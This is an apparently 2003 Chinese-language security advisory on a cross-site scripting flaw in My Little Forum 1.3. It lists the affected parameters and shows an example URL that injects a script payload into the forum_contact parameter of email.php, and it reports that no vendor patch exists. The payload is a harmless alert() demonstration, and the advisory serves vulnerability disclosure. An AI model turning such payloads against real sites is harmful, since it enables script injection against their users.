|
My Little Forum存在跨站脚本执行缺陷
|
|
来源:vittersafe.yeah.net 作者:vitter 发布时间:2003-12-24
|
|
My Little Forum存在跨站脚本执行缺陷
涉及程序:
My Little Forum 1.3版
描述:
My Little Forum存在跨站脚本执行缺陷
详细:
My Little Forum 是一款基于MYSQL数据库,利用PHP编写的WEB论坛程序。My Little Forum 包含的forum_contact, category和page等参数存在缺陷,当用户浏览攻击者精心构造的包含恶意HTML或Java脚本代码的页面时,能导致在用户的系统上执行攻击者嵌入的恶意代码:
http://vulnerablesite/forum/email.php?forum_contact="><script>alert(document.domain);</script>
攻击方法:
示例代码:
http://vulnerablesite/forum/email.php?forum_contact="><script>alert(document.domain);</script>
解决方案:
目前厂商未公布该缺陷补丁,请用户及时关注厂商站点:
http://www.mylittlehomepage.net/
附加信息:
无
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
